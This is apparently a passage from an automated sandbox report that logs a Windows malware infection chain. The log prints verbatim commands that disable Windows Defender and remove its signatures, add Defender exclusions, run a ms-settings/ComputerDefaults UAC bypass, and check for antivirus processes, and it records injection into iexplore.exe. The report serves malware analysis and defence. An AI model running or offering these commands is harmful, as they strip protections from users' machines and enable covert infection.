                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Removes signatures from Windows Defender
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                        Writes to foreign memory regions
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 31D0008
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009F1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_009F1B4D
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_0099338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_0099338B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FBBED SendInput,keybd_event,10_2_009FBBED
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009FEC9E mouse_event,10_2_009FEC9E
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "perulesserpalacecorrespondence" Video Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Outlook + Imports 1181\UJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif 1181\End.pif 1181\UJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults --nouacbypass
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                        Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete hkcu\Software\Classes\ms-settings /f
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009F14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_009F14AE
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009F1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_009F1FB0
                        Source: Og1SeeXcB2.exe, 00000000.00000003.1669698416.00000000027E5000.00000004.00000020.00020000.00000000.sdmp, End.pif, 0000000A.00000000.1701584318.0000000000A53000.00000002.00000001.01000000.00000005.sdmp, End.pif, 0000000D.00000002.1881518198.0000000000A53000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                        Source: End.pif, explorer.exe, 00000012.00000000.2006529919.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2004637207.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.2003319337.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000012.00000000.2003319337.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                        Source: explorer.exe, 00000012.00000000.2002954132.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                        Source: explorer.exe, 00000012.00000000.2003319337.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                        Source: explorer.exe, 00000012.00000000.2003319337.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B0A08 cpuid 10_2_009B0A08
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\ucrtbase.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\_ctypes.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI43482\base_library.zip VolumeInformation
